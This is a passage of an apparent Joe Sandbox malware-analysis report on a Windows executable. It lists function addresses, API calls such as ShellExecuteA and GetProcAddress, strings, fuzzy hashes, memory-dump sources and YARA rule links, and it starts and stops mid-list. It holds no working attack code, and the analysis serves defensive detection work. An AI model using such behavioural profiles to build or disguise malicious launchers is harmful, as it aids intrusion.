                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$CloseDeleteNextSleep
                                                                                                                                              • String ID: %s\%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 46525011-3194912456
                                                                                                                                              • Opcode ID: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                                              • Instruction ID: 7511dff2b348f996f6420e377bb50597cd3438be433f07267ca9a05eeeba9e8e
                                                                                                                                              • Opcode Fuzzy Hash: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                                              • Instruction Fuzzy Hash: 6831D97114C3809BE724DF64CC55FDB73A8EFC4704F44492EB98953281DB79A609CB6A
                                                                                                                                              Function 0043BF48 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0043BF6C
                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 0043BF74
                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043BF81
                                                                                                                                              • GetDC.USER32(00000000), ref: 0043BF90
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BFA4
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0043BFB0
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043BFBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 46613423-3470857405
                                                                                                                                              • Opcode ID: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                                              • Instruction ID: 481e154c11c6ec21bb8af5e6b4aac1b2a550fc1cfe250600bab0cbb86326bdff
                                                                                                                                              • Opcode Fuzzy Hash: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                                              • Instruction Fuzzy Hash: A0118271A00218EBEB10ABA0DC45B9E7B78FF4A745F11502AF705A7180D7759D41CBA9
                                                                                                                                              Function 0042927A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __allrem.LIBCMT ref: 00429332
                                                                                                                                              • __allrem.LIBCMT ref: 0042934A
                                                                                                                                              • __allrem.LIBCMT ref: 00429366
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293A1
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293BD
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293D4
                                                                                                                                                • Part of subcall function 0042DE49: __lock.LIBCMT ref: 0042DE61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                                                              • String ID: E
                                                                                                                                              • API String ID: 4106114094-3568589458
                                                                                                                                              • Opcode ID: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                                              • Instruction ID: 1f7421b91edd23947d41c505488e0d727590d15bd34b202d747290f0fbd76ec4
                                                                                                                                              • Opcode Fuzzy Hash: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                                              • Instruction Fuzzy Hash: AF716F71F00229AFDF14EFA9DC81BAEB7B5BB48314F54816AE514E3281D378AE418B54
                                                                                                                                              Function 00410E60 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00410FA8
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410FB6
                                                                                                                                              • LocalFree.KERNEL32(?,00000000,?,setCacheSize,00000000), ref: 00410FD4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                              • String ID: %I64d$CacheSize$SOFTWARE\$setCacheSize
                                                                                                                                              • API String ID: 1365068426-3604744950
                                                                                                                                              • Opcode ID: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                                              • Instruction ID: 601950fcef0dd2d4f76d757b2b0c535ca4c20b87e929a9b96b2bb7084ee85d76
                                                                                                                                              • Opcode Fuzzy Hash: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                                              • Instruction Fuzzy Hash: DF4127712083429BD324DF28C811BBBB7E5FBC9704F104A1EF99597280DBB5A846C79A
                                                                                                                                              Function 00417940 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileVersionInfoSizeA.VERSION(?,?,?,?,75934B00), ref: 00417983
                                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?,75934B00), ref: 004179C5
                                                                                                                                              • VerQueryValueA.VERSION(00000000,\VarFileInfo\Translation,0047E5B0,?,?,?,00000000,00000000,?,75934B00), ref: 004179E2
                                                                                                                                              • wsprintfA.USER32 ref: 00417A16
                                                                                                                                              • VerQueryValueA.VERSION(00000000,00000000,?,?,?,?,00000000,00000000,?,75934B00), ref: 00417A27
                                                                                                                                              Strings
                                                                                                                                              • \StringFileInfo\%04x%04x\FileVersion, xrefs: 00417A10
                                                                                                                                              • \VarFileInfo\Translation, xrefs: 004179DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileInfoQueryValueVersion$Sizewsprintf
                                                                                                                                              • String ID: \StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation
                                                                                                                                              • API String ID: 2824581984-2452293203
                                                                                                                                              • Opcode ID: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                                              • Instruction ID: 9c2dee7650dbba52f5ac2e6fe99141784f30488717657b5f3132d8fa3abcba4e
                                                                                                                                              • Opcode Fuzzy Hash: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                                              • Instruction Fuzzy Hash: 5F41E3315482419FD321DA69D841EEFB7E89FD9344F04491EF88587201EA3CDA4A8BA6
                                                                                                                                              Function 0040A590 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                                • Part of subcall function 00426C93: SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                                                • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                                                • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                                • Part of subcall function 00426C93: SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                                • Part of subcall function 00426C93: GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              • SystemParametersInfoA.USER32(00002000,00000000,?,00000000), ref: 0040A684
                                                                                                                                              • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000003), ref: 0040A691
                                                                                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 0040A6A5
                                                                                                                                              • SystemParametersInfoA.USER32(00002000,00000000,?,00000003), ref: 0040A6BF
                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,00000000,?,00000001,?,?,?), ref: 0040A6D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectoryInfoParametersSystem$AddressEnvironmentErrorExecuteLastLibraryLoadProcShellSleepVariable
                                                                                                                                              • String ID: %s\%s$open
                                                                                                                                              • API String ID: 2525041801-538903891
                                                                                                                                              • Opcode ID: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                                              • Instruction ID: 2af7baaca54277b22fbb167bc7bcba665f60fb619d4bc69c6d1dc5b5fddf270f
                                                                                                                                              • Opcode Fuzzy Hash: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                                              • Instruction Fuzzy Hash: 5741C672184340ABE220DF54EC42FEBB7A8EB98B10F04092EB695571C1DB75A518C7AB
                                                                                                                                              Function 0042CD8E Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042CE0F
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,0044D548,00000000,?,00000000,00000000,00000000,00000000), ref: 0042CEDC
                                                                                                                                              • WriteFile.KERNEL32(00000000), ref: 0042CEE3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                              • API String ID: 3784150691-4022980321
                                                                                                                                              • Opcode ID: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                                              • Instruction ID: c978e48409516c837b9f7d6b109fcdf73a8d35c650ed7adbf1cf9c7f4bbfdedb
                                                                                                                                              • Opcode Fuzzy Hash: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                                              • Instruction Fuzzy Hash: 84311532700224ABDB20AB75BCC2EAF3769EB45314FA1082FF515E3193DE3C9955866C
                                                                                                                                              Function 0044399E Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
